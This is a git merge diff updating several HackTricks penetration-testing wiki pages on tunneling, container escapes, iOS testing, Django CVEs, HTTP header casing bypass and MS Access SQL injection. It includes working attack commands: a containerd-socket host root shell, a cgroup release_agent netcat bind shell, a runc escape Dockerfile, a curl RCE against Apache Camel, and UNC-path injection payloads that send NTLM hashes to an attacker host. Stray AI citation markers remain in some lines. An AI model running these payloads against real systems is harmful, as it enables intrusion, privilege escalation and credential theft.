Merge branch 'master' of github.com:HackTricks-wiki/hacktricks

src/generic-hacking/tunneling-and-port-forwarding.md

@@ -107,7 +107,7 @@ route add -net 10.0.0.0/16 gw 1.1.1.1
 
 > [!NOTE]
 > **Security – Terrapin Attack (CVE-2023-48795)**  
-> The 2023 Terrapin downgrade attack can let a man-in-the-middle tamper with the early SSH handshake and inject data into **any forwarded channel** ( `-L`, `-R`, `-D` ). Ensure both client and server are patched (**OpenSSH ≥ 9.6/LibreSSH 6.7**) or explicitly disable the vulnerable `chacha20-poly1305@openssh.com` and `*-etm@openssh.com` algorithms in `sshd_config`/`ssh_config` before relying on SSH tunnels. citeturn4search0
+> The 2023 Terrapin downgrade attack can let a man-in-the-middle tamper with the early SSH handshake and inject data into **any forwarded channel** ( `-L`, `-R`, `-D` ). Ensure both client and server are patched (**OpenSSH ≥ 9.6/LibreSSH 6.7**) or explicitly disable the vulnerable `chacha20-poly1305@openssh.com` and `*-etm@openssh.com` algorithms in `sshd_config`/`ssh_config` before relying on SSH tunnels. 
 
 ## SSHUTTLE
 
@@ -686,7 +686,7 @@ Start the connector:
 cloudflared tunnel run mytunnel
 ```
 
-Because all traffic leaves the host **outbound over 443**, Cloudflared tunnels are a simple way to bypass ingress ACLs or NAT boundaries. Be aware that the binary usually runs with elevated privileges – use containers or the `--user` flag when possible. citeturn1search0
+Because all traffic leaves the host **outbound over 443**, Cloudflared tunnels are a simple way to bypass ingress ACLs or NAT boundaries. Be aware that the binary usually runs with elevated privileges – use containers or the `--user` flag when possible. 
 
 ## FRP (Fast Reverse Proxy)
 
@@ -724,7 +724,7 @@ sshTunnelGateway.bindPort = 2200   # add to frps.toml
 ssh -R :80:127.0.0.1:8080 v0@attacker_ip -p 2200 tcp --proxy_name web --remote_port 9000
 ```
 
-The above command publishes the victim’s port **8080** as **attacker_ip:9000** without deploying any additional tooling – ideal for living-off-the-land pivoting. citeturn2search1
+The above command publishes the victim’s port **8080** as **attacker_ip:9000** without deploying any additional tooling – ideal for living-off-the-land pivoting. 
 
 ## Other tools to check
 
@@ -734,4 +734,3 @@ The above command publishes the victim’s port **8080** as **attacker_ip:9000**
 {{#include ../banners/hacktricks-training.md}}
 
 
-

src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/sensitive-mounts.md

@@ -291,8 +291,69 @@ locate the other containers' filesystems and SA / web identity tokens
 
 
 
+### Other Sensitive Host Sockets and Directories (2023-2025)
+
+Mounting certain host Unix sockets or writable pseudo-filesystems is equivalent to giving the container full root on the node. **Treat the following paths as highly sensitive and never expose them to untrusted workloads**:
+
+```text
+/run/containerd/containerd.sock     # containerd CRI socket
+/var/run/crio/crio.sock             # CRI-O runtime socket
+/run/podman/podman.sock             # Podman API (rootful or rootless)
+/var/run/kubelet.sock               # Kubelet API on Kubernetes nodes
+/run/firecracker-containerd.sock    # Kata / Firecracker
+```
+
+Attack example abusing a mounted **containerd** socket:
+
+```bash
+# inside the container (socket is mounted at /host/run/containerd.sock)
+ctr --address /host/run/containerd.sock images pull docker.io/library/busybox:latest
+ctr --address /host/run/containerd.sock run --tty --privileged --mount \
+  type=bind,src=/,dst=/host,options=rbind:rw docker.io/library/busybox:latest host /bin/sh
+chroot /host /bin/bash   # full root shell on the host
+```
+
+A similar technique works with **crictl**, **podman** or the **kubelet** API once their respective sockets are exposed.
+
+Writable **cgroup v1** mounts are also dangerous. If `/sys/fs/cgroup` is bind-mounted **rw** and the host kernel is vulnerable to **CVE-2022-0492**, an attacker can set a malicious `release_agent` and execute arbitrary code in the *initial* namespace:
+
+```bash
+# assuming the container has CAP_SYS_ADMIN and a vulnerable kernel
+mkdir -p /tmp/x && echo 1 > /tmp/x/notify_on_release
+
+echo '/tmp/pwn' > /sys/fs/cgroup/release_agent   # requires CVE-2022-0492
+
+echo -e '#!/bin/sh\nnc -lp 4444 -e /bin/sh' > /tmp/pwn && chmod +x /tmp/pwn
+sh -c "echo 0 > /tmp/x/cgroup.procs"  # triggers the empty-cgroup event
+```
+
+When the last process leaves the cgroup, `/tmp/pwn` runs **as root on the host**. Patched kernels (>5.8 with commit `32a0db39f30d`) validate the writer’s capabilities and block this abuse.  
+
+### Mount-Related Escape CVEs (2023-2025)
+
+* **CVE-2024-21626 – runc “Leaky Vessels” file-descriptor leak**  
+  runc ≤1.1.11 leaked an open directory file descriptor that could point to the host root. A malicious image or `docker exec` could start a container whose *working directory* is already on the host filesystem, enabling arbitrary file read/write and privilege escalation. Fixed in runc 1.1.12 (Docker ≥25.0.3, containerd ≥1.7.14). 
+
+  ```Dockerfile
+  FROM scratch
+  WORKDIR /proc/self/fd/4   # 4 == "/" on the host leaked by the runtime
+  CMD ["/bin/sh"]
+  ```
+
+* **CVE-2024-23651 / 23653 – BuildKit OverlayFS copy-up TOCTOU**  
+  A race condition in the BuildKit snapshotter let an attacker replace a file that was about to be *copy-up* into the container’s rootfs with a symlink to an arbitrary path on the host, gaining write access outside the build context. Fixed in BuildKit v0.12.5 / Buildx 0.12.0. Exploitation requires an untrusted `docker build` on a vulnerable daemon.
+
+### Hardening Reminders (2025)
+
+1. Bind-mount host paths **read-only** whenever possible and add `nosuid,nodev,noexec` mount options.
+2. Prefer dedicated side-car proxies or rootless clients instead of exposing the runtime socket directly.
+3. Keep the container runtime up-to-date (runc ≥1.1.12, BuildKit ≥0.12.5, containerd ≥1.7.14).
+4. In Kubernetes, use `securityContext.readOnlyRootFilesystem: true`, the *restricted* PodSecurity profile and avoid `hostPath` volumes pointing to the paths listed above.
+
 ### References
 
+- [runc CVE-2024-21626 advisory](https://github.com/opencontainers/runc/security/advisories/GHSA-xr7r-f8xq-vfvv)
+- [Unit 42 analysis of CVE-2022-0492](https://unit42.paloaltonetworks.com/cve-2022-0492-cgroups/)
 - [https://0xn3va.gitbook.io/cheat-sheets/container/escaping/sensitive-mounts](https://0xn3va.gitbook.io/cheat-sheets/container/escaping/sensitive-mounts)
 - [Understanding and Hardening Linux Containers](https://research.nccgroup.com/wp-content/uploads/2020/07/ncc_group_understanding_hardening_linux_containers-1-1.pdf)
 - [Abusing Privileged and Unprivileged Linux Containers](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2016/june/container_whitepaper.pdf)
@@ -300,4 +361,3 @@ locate the other containers' filesystems and SA / web identity tokens
 {{#include ../../../../banners/hacktricks-training.md}}
 
 
-

src/mobile-pentesting/ios-pentesting/ios-pentesting-without-jailbreak.md

@@ -2,7 +2,6 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-
 ## Main idea
 
 Applications signed with the **entitlement `get_task_allow`** allow third party applications to run a function called **`task_for_pid()`** with the process ID of the initial application as argument in order to get the task port over it (be able to control it and access it's memory).
@@ -56,32 +55,78 @@ Note that you might need **AppSync Unified tweak** from Cydia to prevent any `in
 Once intalled, you can use **Iridium tweak** from Cydia in order to obtain the decrypted IPA.
 
 
-### Patch entitlements & re-sign
+### Patch entitlements & re-sign
 
 In order to re-sign the application with the `get-task-allow` entitlement there are several tools available like `app-signer`, `codesign`, and `iResign`. `app-signer` has a very user-friendly interface that allows to very easily resing an IPA file indicating the IPA to re-sign, to **put it `get-taks-allow`** and the certificate and provisioning profile to use.
 
 Regarding the certificate and signing profiles, Apple offers **free developer signing profiles** for all accounts through Xcode. Just create an app and configure one. Then, configure the **iPhone to trust the developer apps** by navigating to `Settings` → `Privacy & Security`, and click on `Developer Mode`.
 
-
 With the re-signed IPA, it's time to install it in the device to pentest it:
 
 ```bash
 ideviceinstaller -i resigned.ipa -w
 ```
 
-### Hook
+---
 
-You could easily hook your app using common tools like frida an objection:
+### Enable Developer Mode (iOS 16+)
+
+Since iOS 16 Apple introduced **Developer Mode**: any binary that carries `get_task_allow` *or* is signed with a development certificate will refuse to launch until Developer Mode is enabled on the device. You will also not be able to attach Frida/LLDB unless this flag is on.
+
+1. Install or push **any** developer-signed IPA to the phone.
+2. Navigate to **Settings → Privacy & Security → Developer Mode** and toggle it on.
+3. The device will reboot; after entering the passcode you will be asked to **Turn On** Developer Mode.
+
+Developer Mode remains active until you disable it or wipe the phone, so this step only needs to be performed once per device. [Apple documentation](https://developer.apple.com/documentation/xcode/enabling-developer-mode-on-a-device) explains the security implications.
+
+### Modern sideloading options
+
+There are now several mature ways to sideload and keep re-signed IPAs up-to-date without a jailbreak:
+
+| Tool | Requirements | Strengths | Limitations |
+|------|--------------|-----------|-------------|
+| **AltStore 2 / SideStore** | macOS/Windows/Linux companion that re-signs the IPA every 7 days with a free dev profile | Automatic reload over Wi-Fi, works up to iOS 17 | Needs computer on the same network, 3-app limit imposed by Apple |
+| **TrollStore 1/2** | Device on iOS 14 – 15.4.1 vulnerable to the CoreTrust bug | *Permanent* signing (no 7-day limit); no computer required once installed | Not supported on iOS 15.5+ (bug patched) |
+
+For routine pentests on current iOS versions Alt/Side-Store are usually the most practical choice.
+
+### Hooking / dynamic instrumentation
+
+You can hook your app exactly as on a jailbroken device once it is signed with `get_task_allow` **and** Developer Mode is on:
 
 ```bash
-objection -g [your app bundle ID] explore
+# Spawn & attach with objection
+objection -g "com.example.target" explore
 
+# Or plain Frida
+frida -U -f com.example.target -l my_script.js --no-pause
 ```
 
+Recent Frida releases (>=16) automatically handle pointer authentication and other iOS 17 mitigations, so most existing scripts work out-of-the-box.
+
+### Automated dynamic analysis with MobSF (no jailbreak)
+
+[MobSF](https://mobsf.github.io/Mobile-Security-Framework-MobSF/) can instrument a dev-signed IPA on a real device using the same technique (`get_task_allow`) and provides a web UI with filesystem browser, traffic capture and Frida console【turn6view0†L2-L3】. The quickest way is to run MobSF in Docker and then plug your iPhone via USB:
+
+```bash
+docker pull opensecurity/mobile-security-framework-mobsf:latest
+docker run -p 8000:8000 --privileged \
+           -v /var/run/usbmuxd:/var/run/usbmuxd \
+           opensecurity/mobile-security-framework-mobsf:latest
+# Browse to http://127.0.0.1:8000 and upload your resigned IPA
+```
+
+MobSF will automatically deploy the binary, enable a Frida server inside the app sandbox and generate an interactive report.
+
+### iOS 17 & Lockdown Mode caveats
+
+* **Lockdown Mode** (Settings → Privacy & Security) blocks the dynamic linker from loading unsigned or externally signed dynamic libraries. When testing devices that might have this mode enabled make sure it is **disabled** or your Frida/objection sessions will terminate immediately.
+* Pointer Authentication (PAC) is enforced system-wide on A12+ devices. Frida ≥16 transparently handles PAC stripping — just keep both *frida-server* and the Python/CLI toolchain up-to-date when a new major iOS version ships.
 
 ## References
 
 - [https://dvuln.com/blog/modern-ios-pentesting-no-jailbreak-needed](https://dvuln.com/blog/modern-ios-pentesting-no-jailbreak-needed)
-
+- Apple developer documentation – Enabling Developer Mode on a device: <https://developer.apple.com/documentation/xcode/enabling-developer-mode-on-a-device>
+- Mobile Security Framework (MobSF): <https://mobsf.github.io/Mobile-Security-Framework-MobSF/>
 
 {{#include ../../banners/hacktricks-training.md}}

src/network-services-pentesting/pentesting-web/django.md

@@ -65,15 +65,15 @@ Send the resulting cookie, and the payload runs with the permissions of the WSGI
 ---
 
 ## Recent (2023-2025) High-Impact Django CVEs Pentesters Should Check
-* **CVE-2025-48432** – *Log Injection via unescaped `request.path`* (fixed June 4 2025). Allows attackers to smuggle newlines/ANSI codes into log files and poison downstream log analysis. Patch level ≥ 4.2.22 / 5.1.10 / 5.2.2. citeturn0search0
+* **CVE-2025-48432** – *Log Injection via unescaped `request.path`* (fixed June 4 2025). Allows attackers to smuggle newlines/ANSI codes into log files and poison downstream log analysis. Patch level ≥ 4.2.22 / 5.1.10 / 5.2.2. 
-* **CVE-2024-42005** – *Critical SQL injection* in `QuerySet.values()/values_list()` on `JSONField` (CVSS 9.8). Craft JSON keys to break out of quoting and execute arbitrary SQL. Fixed in 4.2.15 / 5.0.8. citeturn1search2
+* **CVE-2024-42005** – *Critical SQL injection* in `QuerySet.values()/values_list()` on `JSONField` (CVSS 9.8). Craft JSON keys to break out of quoting and execute arbitrary SQL. Fixed in 4.2.15 / 5.0.8. 
 
 Always fingerprint the exact framework version via the `X-Frame-Options` error page or `/static/admin/css/base.css` hash and test the above where applicable.
 
 ---
 
 ## References
-* Django security release – "Django 5.2.2, 5.1.10, 4.2.22 address CVE-2025-48432" – 4 Jun 2025. citeturn0search0
+* Django security release – "Django 5.2.2, 5.1.10, 4.2.22 address CVE-2025-48432" – 4 Jun 2025. 
-* OP-Innovate: "Django releases security updates to address SQL injection flaw CVE-2024-42005" – 11 Aug 2024. citeturn1search2
+* OP-Innovate: "Django releases security updates to address SQL injection flaw CVE-2024-42005" – 11 Aug 2024. 
 
 {{#include /src/banners/hacktricks-training.md}}

src/network-services-pentesting/pentesting-web/special-http-headers.md

@@ -193,8 +193,46 @@ Lastly, HSTS is a security feature that forces browsers to communicate with serv
 Strict-Transport-Security: max-age=3153600
 ```
 
+## Header Name Casing Bypass
+
+HTTP/1.1 defines header field‐names as **case-insensitive** (RFC 9110 §5.1). Nevertheless, it is very common to find custom middleware, security filters, or business logic that compare the *literal* header name received without normalising the casing first (e.g. `header.equals("CamelExecCommandExecutable")`).  If those checks are performed **case-sensitively**, an attacker may bypass them simply by sending the same header with a different capitalisation.
+
+Typical situations where this mistake appears:
+
+* Custom allow/deny lists that try to block “dangerous” internal headers before the request reaches a sensitive component.
+* In-house implementations of reverse-proxy pseudo-headers (e.g. `X-Forwarded-For` sanitisation).
+* Frameworks that expose management / debug endpoints and rely on header names for authentication or command selection.
+
+### Abusing the bypass
+
+1. Identify a header that is filtered or validated server-side (for example, by reading source code, documentation, or error messages).
+2. Send the **same header with a different casing** (mixed-case or upper-case).  Because HTTP stacks usually canonicalise headers only *after* user code has run, the vulnerable check can be skipped.
+3. If the downstream component treats headers in a case-insensitive way (most do), it will accept the attacker-controlled value.
+
+### Example: Apache Camel `exec` RCE (CVE-2025-27636)
+
+In vulnerable versions of Apache Camel the *Command Center* routes try to block untrusted requests by stripping the headers `CamelExecCommandExecutable` and `CamelExecCommandArgs`.  The comparison was done with `equals()` so only the exact lowercase names were removed.
+
+```bash
+# Bypass the filter by using mixed-case header names and execute `ls /` on the host
+curl "http://<IP>/command-center" \
+  -H "CAmelExecCommandExecutable: ls" \
+  -H "CAmelExecCommandArgs: /"
+```
+
+The headers reach the `exec` component unfiltered, resulting in remote command execution with the privileges of the Camel process.
+
+### Detection & Mitigation
+
+* Normalise all header names to a single case (usually lowercase) **before** performing allow/deny comparisons.
+* Reject suspicious duplicates: if both `Header:` and `HeAdEr:` are present, treat it as an anomaly.
+* Use a positive allow-list enforced **after** canonicalisation.
+* Protect management endpoints with authentication and network segmentation.
+
+
 ## References
 
+- [CVE-2025-27636 – RCE in Apache Camel via header casing bypass (OffSec blog)](https://www.offsec.com/blog/cve-2025-27636/)
 - [https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Disposition](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Disposition)
 - [https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers)
 - [https://web.dev/security-headers/](https://web.dev/security-headers/)

src/pentesting-web/sql-injection/ms-access-sql-injection.md

@@ -4,7 +4,7 @@
 
 ## Online Playground
 
-- [https://www.w3schools.com/sql/trysql.asp?filename=trysql_func_ms_format\&ss=-1](https://www.w3schools.com/sql/trysql.asp?filename=trysql_func_ms_format&ss=-1)
+- [https://www.w3schools.com/sql/trysql.asp?filename=trysql_func_ms_format&ss=-1](https://www.w3schools.com/sql/trysql.asp?filename=trysql_func_ms_format&ss=-1)
 
 ## DB Limitations
 
@@ -127,9 +127,21 @@ IIF((select mid(last(username),1,1) from (select top 10 username from users))='a
 
 In a nutshell, the query uses an “if-then” statement in order to trigger a “200 OK” in case of success or a “500 Internal Error” otherwise. Taking advantage of the TOP 10 operator, it is possible to select the first ten results. The subsequent usage of LAST allows to consider the 10th tuple only. On such value, using the MID operator, it is possible to perform a simple character comparison. Properly changing the index of MID and TOP, we can dump the content of the “username” field for all rows.
 
-### Time Based
+### Time-Based (Blind) Tricks
 
-Check [https://docs.microsoft.com/en-us/previous-versions/tn-archive/cc512676(v=technet.10)?redirectedfrom=MSDN](<https://docs.microsoft.com/en-us/previous-versions/tn-archive/cc512676(v=technet.10)?redirectedfrom=MSDN>)
+Jet/ACE SQL itself does **not** expose a native `SLEEP()` or `WAITFOR` function, so traditional time-based blind injections are limited. However, you can still introduce a measurable delay by forcing the engine to access a **network resource that is slow or does not answer**. Because the engine will try to open the file before returning the result, the HTTP response time reflects the round-trip latency to the attacker-controlled host.
+
+```sql
+' UNION SELECT 1 FROM SomeTable IN '\\10.10.14.3\doesnotexist\dummy.mdb'--
+```
+
+Point the UNC path to:
+
+* a SMB share behind a high-latency link
+* a host that drops the TCP handshake after `SYN-ACK`
+* a firewall sinkhole
+
+The extra seconds introduced by the remote lookup can be used as an **out-of-band timing oracle** for boolean conditions (e.g. pick a slow path only when the injected predicate is true). Microsoft documents the remote database behaviour and the associated registry kill-switch in KB5002984. citeturn1search0
 
 ### Other Interesting functions
 
@@ -162,7 +174,7 @@ However, note that is very typical to find SQL Injections where you **don't have
 
 The knowledge of the **web root absolute path may facilitate further attacks**. If application errors are not completely concealed, the directory path can be uncovered trying to select data from an inexistent database.
 
-`http://localhost/script.asp?id=1'+'+UNION+SELECT+1+FROM+FakeDB.FakeTable%00`
+`http://localhost/script.asp?id=1'+ '+UNION+SELECT+1+FROM+FakeDB.FakeTable%00`
 
 MS Access responds with an **error message containing the web directory full pathname**.
 
@@ -182,7 +194,42 @@ Another way to enumerate files consists into **specifying a database.table item*
 
 `http://localhost/script.asp?id=1'+UNION+SELECT+1+FROM+name[i].realTable%00`
 
-Where **name\[i] is a .mdb filename** and **realTable is an existent table** within the database. Although MS Access will always trigger an error message, it is possible to distinguish between an invalid filename and a valid .mdb filename.
+Where **name[i] is a .mdb filename** and **realTable is an existent table** within the database. Although MS Access will always trigger an error message, it is possible to distinguish between an invalid filename and a valid .mdb filename.
+
+### Remote Database Access & NTLM Credential Theft (2023)
+
+Since Jet 4.0 every query can reference a table located in a *different* `.mdb/.accdb` file via the `IN '<path>'` clause:
+
+```sql
+SELECT first_name FROM Employees IN '\\server\share\hr.accdb';
+```
+
+If user input is concatenated into the part after **IN** (or into a `JOIN … IN` / `OPENROWSET` / `OPENDATASOURCE` call) an attacker can specify a **UNC path** that points to a host they control. The engine will:
+
+1. try to authenticate over SMB / HTTP to open the remote database; 
+2. leak the web-server’s **NTLM credentials** (forced authentication); 
+3. parse the remote file – a malformed or malicious database can trigger Jet/ACE memory-corruption bugs that have been patched multiple times (e.g. CVE-2021-28455).
+
+Practical injection example:
+
+```sql
+1' UNION SELECT TOP 1 name
+   FROM MSysObjects
+   IN '\\attacker\share\poc.mdb'-- -
+```
+
+Impact:
+
+* Out-of-band exfiltration of Net-NTLMv2 hashes (usable for relay or offline cracking).
+* Potential remote code execution if a new Jet/ACE parser bug is exploited.
+
+Mitigations (recommended even for legacy Classic ASP apps):
+
+* Add the registry value `AllowQueryRemoteTables = 0` under `HKLM\Software\Microsoft\Jet\4.0\Engines` (and under the equivalent ACE path). This forces Jet/ACE to reject remote paths starting with `\\`.
+* Block outbound SMB/WebDAV at the network boundary.
+* Sanitize / parameterise any part of a query that may end up inside an `IN` clause.
+
+The forced-authentication vector was revisited by Check Point Research in 2023, proving it is still exploitable on fully patched Windows Server when the registry key is absent. citeturn0search0
 
 ### .mdb Password Cracker
 
@@ -191,8 +238,7 @@ Where **name\[i] is a .mdb filename** and **realTable is an existent table** wit
 ## References
 
 - [http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html](http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html)
+- [Microsoft KB5002984 – Configuring Jet/ACE to block remote tables](https://support.microsoft.com/en-gb/topic/kb5002984-configuring-jet-red-database-engine-and-access-connectivity-engine-to-block-access-to-remote-databases-56406821-30f3-475c-a492-208b9bd30544)
+- [Check Point Research – Abusing Microsoft Access Linked Tables for NTLM Forced Authentication (2023)](https://research.checkpoint.com/2023/abusing-microsoft-access-linked-table-feature-to-perform-ntlm-forced-authentication-attacks/)
 
 {{#include ../../banners/hacktricks-training.md}}
-
-
-